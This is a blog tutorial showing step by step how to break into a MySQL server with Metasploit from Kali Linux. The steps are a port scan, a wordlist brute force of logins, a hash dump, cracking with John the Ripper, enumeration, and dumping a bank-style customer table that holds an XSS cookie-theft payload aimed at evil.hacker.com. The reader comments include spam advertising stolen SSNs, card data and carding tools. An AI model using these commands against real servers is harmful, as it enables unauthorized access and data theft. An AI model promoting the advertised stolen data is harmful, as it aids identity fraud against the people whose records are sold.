Saturday, 27 June 2015

Hack MySQL Server in RHEL7 using Metasploit in Kali Linux


In this tutorial, we will hack MySQL Server running in RHEL 7 using Metasploit running in Kali Linux.

MySQL Server Name: meru.mycompany.com
MySQL Server IP Address: 192.168.122.1

Perform the following steps on the Kali Linux Machine

1) Start the services.
root@kali:~# service postgresql start
[ ok ] Starting PostgreSQL 9.1 database server: main.

root@kali:~# service metasploit start
[ ok ] Starting Metasploit rpc server: prosvc.[ ok ] Starting Metasploit web server: thin.
[ ok ] Starting Metasploit worker: worker.

root@kali:~# msfconsole
msf >


2) Perform nmap scan on MySQL Server.
msf > db_nmap -sV 192.168.122.1 -p 3306
[*] Nmap: Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-27 10:03 IST
[*] Nmap: Nmap scan report for meru.mycompany.com (192.168.122.1)
[*] Nmap: Host is up (0.00034s latency).
[*] Nmap: PORT     STATE SERVICE VERSION
[*] Nmap: 3306/tcp open  mysql   MySQL 5.5.35-MariaDB
[*] Nmap: MAC Address: 52:54:00:8A:8D:BA (QEMU Virtual NIC)
[*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds


3) Perform brute force password attack.
msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             3306             yes       The target port

   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts


msf auxiliary(mysql_login) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt
USER_FILE => /usr/share/metasploit-framework/data/wordlists/unix_users.txt

msf auxiliary(mysql_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
PASS_FILE => /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

msf auxiliary(mysql_login) > set RHOSTS 192.168.122.1
RHOSTS => 192.168.122.1

msf auxiliary(mysql_login) > set STOP_ON_SUCCESS  true
STOP_ON_SUCCESS => true

msf auxiliary(mysql_login) > run

[*] 192.168.122.1:3306 MYSQL - Found remote MySQL version 5.5.35
Access denied for user 'anon'@'192.168.122.115' (using password: YES))[-] 192.168.122.1:3306 MYSQL - LOGIN FAILED: anon:iloveyou (Incorrect: Access denied for user 'anon'@'192.168.122.115' (using password: YES))
[-] 192.168.122.1:3306 MYSQL - LOGIN FAILED: anon:admin (Incorrect: Access denied for user 'anon'@'192.168.122.115' (using password: YES))
[+] 192.168.122.1:3306 MYSQL - Success: 'root:root'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


As seen above, we have cracked login credentials for User 'root' with password 'root'


4) Capture other user credentials. We will capture the password hashes and then crack it using John the Ripper.

msf > use auxiliary/scanner/mysql/mysql_hashdump
msf auxiliary(mysql_hashdump) > show options

Module options (auxiliary/scanner/mysql/mysql_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target address range or CIDR identifier

   RPORT     3306             yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME                   no        The username to authenticate as


msf auxiliary(mysql_hashdump) > set USERNAME root
USERNAME => root
msf auxiliary(mysql_hashdump) > set PASSWORD root
PASSWORD => root
msf auxiliary(mysql_hashdump) > run

[+] Saving HashString as Loot: root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[+] Saving HashString as Loot: root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[+] Saving HashString as Loot: root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[+] Saving HashString as Loot: shabbir:*8A5EC1AC3F305AF2D49B4AC632B4829A9440E667
[+] Saving HashString as Loot: user:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] Saving HashString as Loot: anon@localhost:*2CE4701D02A76C12CD513109CA16967A68B4C23A
[+] Saving HashString as Loot: anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A
[+] Saving HashString as Loot: anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A
[+] Saving HashString as Loot: root:*01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed



Open another terminal window and copy the password hashes to a file 'temp' as shown below.
root@kali:~# vi temp

root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
root:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
shabbir:*8A5EC1AC3F305AF2D49B4AC632B4829A9440E667
user:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
anon@localhost:*2CE4701D02A76C12CD513109CA16967A68B4C23A
anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A
anon:*2CE4701D02A76C12CD513109CA16967A68B4C23A
root:*01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C


Run John the Ripper to crack the hashes.

root@kali:~# john temp
Created directory: /root/.john
Loaded 9 password hashes with no different salts (MySQL 4.1 double-SHA-1 [128/128 SSE2 intrinsics 4x])
root             (root)
root             (root)
root             (root)
shabbir          (shabbir)
password         (user)
princess         (anon@localhost)
princess         (anon)
princess         (anon)


root@kali:~# john temp --show
root:root
root:root
root:root
shabbir:shabbir
user:password
anon@localhost:princess
anon:princess
anon:princess




5) Browse MySQL Server.

msf > use auxiliary/admin/mysql/mysql_enum 

msf auxiliary(mysql_enum) > show options

Module options (auxiliary/admin/mysql/mysql_enum):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOST                      yes       The target address
   RPORT     3306             yes       The target port
   USERNAME                   no        The username to authenticate as

msf auxiliary(mysql_enum) > set RHOST 192.168.122.1
RHOST => 192.168.122.1

msf auxiliary(mysql_enum) > set USERNAME root
USERNAME => root

msf auxiliary(mysql_enum) > set PASSWORD root
PASSWORD => root

msf auxiliary(mysql_enum) > run

[*] Running MySQL Enumerator...
[*] Enumerating Parameters
[*]     MySQL Version: 5.5.35-MariaDB
[*]     Compiled for the following OS: Linux
[*]     Architecture: x86_64
[*]     Server Hostname: meru.mycompany.com
[*]     Data Directory: /var/lib/mysql/
[*]     Logging of queries and logins: OFF
[*]     Old Password Hashing Algorithm OFF
[*]     Loading of local files: ON
[*]     Logins with old Pre-4.1 Passwords: OFF
[*]     Allow Use of symlinks for Database Files: DISABLED
[*]     Allow Table Merge:
[*]     SSL Connection: DISABLED
[*] Enumerating Accounts:
[*]     List of Accounts with Password Hashes:
[*]         User: root Host: localhost Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: root Host: 127.0.0.1 Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: root Host: ::1 Password Hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: shabbir Host: % Password Hash: *8A5EC1AC3F305AF2D49B4AC632B4829A9440E667
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: user Host: localhost Password Hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: anon@localhost Host: % Password Hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: anon Host: localhost Password Hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: anon Host: 192.168.122.% Password Hash: *2CE4701D02A76C12CD513109CA16967A68B4C23A
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]         User: root Host: % Password Hash: *01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C
[-] *** auxiliary/admin/mysql/mysql_enum is still calling the deprecated report_auth_info method! This needs to be updated!
[*]     The following users have GRANT Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]     The following users have CREATE USER Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following users have RELOAD Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following users have SHUTDOWN Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following users have SUPER Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following users have FILE Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following users have PROCESS Privilege:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following accounts have privileges to the mysql database:
[*]         User: root Host: localhost
[*]         User: root Host: 127.0.0.1
[*]         User: root Host: ::1
[*]         User: root Host: %
[*]     The following accounts are not restricted by source:
[*]         User: anon@localhost Host: %
[*]         User: root Host: %
[*]         User: shabbir Host: %
[*] Auxiliary module execution completed


6) View MySQL Server Database Schema.

msf > info auxiliary/scanner/mysql/mysql_schemadump

       Name: MYSQL Schema Dump
     Module: auxiliary/scanner/mysql/mysql_schemadump
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  theLightCosine <theLightCosine@metasploit.com>

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  DISPLAY_RESULTS  true             yes       Display the Results to the Screen
  PASSWORD                          no        The password for the specified username
  RHOSTS                            yes       The target address range or CIDR identifier
  RPORT            3306             yes       The target port
  THREADS          1                yes       The number of concurrent threads
  USERNAME                          no        The username to authenticate as

Description:
  This module extracts the schema information from a MySQL DB server.

msf > use auxiliary/scanner/mysql/mysql_schemadump 

msf auxiliary(mysql_schemadump) > set USERNAME shabbir
USERNAME => shabbir
msf auxiliary(mysql_schemadump) > set PASSWORD shabbir
PASSWORD => shabbir

msf auxiliary(mysql_schemadump) > set RHOSTS 192.168.122.1
RHOSTS => 192.168.122.1

msf auxiliary(mysql_schemadump) > run

[*] Schema stored in: /root/.msf4/loot/20150627113706_default_192.168.122.1_mysql_schema_138881.txt
[+] MySQL Server Schema
 Host: 192.168.122.1
 Port: 3306
 ====================

---
- DBName: mybank
  Tables:
  - TableName: customer
    Columns:
    - ColumnName: loginid
      ColumnType: varchar(50)
    - ColumnName: passwd
      ColumnType: varchar(50)
    - ColumnName: custname
      ColumnType: varchar(100)
    - ColumnName: accountno
      ColumnType: int(11)
    - ColumnName: balance
      ColumnType: decimal(10,2)
    - ColumnName: address
      ColumnType: varchar(500)
    - ColumnName: mobile
      ColumnType: varchar(50)

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed



7) Run SQL Query

msf auxiliary(mysql_enum) > use auxiliary/admin/mysql/mysql_sql

msf auxiliary(mysql_sql) > show options

Module options (auxiliary/admin/mysql/mysql_sql):

   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   PASSWORD                    no        The password for the specified username
   RHOST                       yes       The target address
   RPORT     3306              yes       The target port
   SQL       select version()  yes       The SQL to execute.
   USERNAME                    no        The username to authenticate as

msf auxiliary(mysql_sql) > set RHOST 192.168.122.1 
RHOST => 192.168.122.1

msf auxiliary(mysql_sql) > set username shabbir
username => shabbir


msf auxiliary(mysql_sql) > set password shabbir
password => shabbir


msf auxiliary(mysql_sql) > set sql select * from mybank.customer
sql => select * from mybank.customer
 

msf auxiliary(mysql_sql) > run

[*] Sending statement: 'select * from mybank.customer'...
[*]  | batul | dahod | batul ben dahod | 1234 | 25000.00 | fdfdfdfdfd | 5454545454 |
[*]  | shabbir | shabbir | shabbir rangwala | 1000 | 49000.00 | dkdkdkdkd dkdkdkdkd | 193933030 |
[*]  | taher | taher | taher saifee | 2000 | 8000.00 | dddl fkfkfl flflflfll | 122222233 |
[*]  | trudy | trudy | trudy chennai | 1050 | 20000.00 | <a href=# onclick="document.location='http://evil.hacker.com/xss.php?c='+escape(document.cookie);"My Address</a> | 2345678531 |
[*] Auxiliary module execution completed



4 comments:

  1. After too many tries it blocks my IP Address. any way around this ?

    Great tutorial by the way !
    Thanks for sharing.

    ReplyDelete
  2. Hey Guys !

    USA Fresh & Verified SSN Leads along with Driving License/ ID Number, AVAILABLE with 99.9% connectivity
    All Leads have genuine & valid information.

    **DETAILS IN LEADS**
    First Name | Last Name | SSN | Dob | Driving License Number | Address | City | State | Zip | Phone Number | Account Number | Payday | Bank Name | Employee Details | IP Address

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
    ->$5 PER EACH

    ->Hope for the long term Business
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  3. Hi Guy's

    Fresh & valid spammed USA SSN+Dob Leads with DL available in bulk.

    >>1$ each SSN+DOB
    >>3$ each with SSN+DOB+DL
    >>5$ each for premium fullz (700+ credit score with replacement guarantee)

    Prices are negotiable in bulk order
    Serious buyer contact me no time wasters please
    Bulk order will be preferable

    CONTACT
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > leads.sellers1212@gmail.com

    OTHER STUFF YOU CAN GET

    SSN+DOB Fullz
    CC's with CVV's (vbv & non-vbv)
    USA Photo ID'S (Front & back)

    All type of tutorials available
    (Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)

    SMTP Linux Root
    DUMPS with pins track 1 and 2
    WU & Bank transfers
    Socks, rdp's, vpn
    Php mailer
    Sql injector
    Bitcoin cracker
    Server I.P's
    HQ Emails with passwords
    All types of tools & tutorials.. & much more

    Looking for long term business
    For trust full vendor, feel free to contact

    CONTACT
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > leads.sellers1212@gmail.com

    ReplyDelete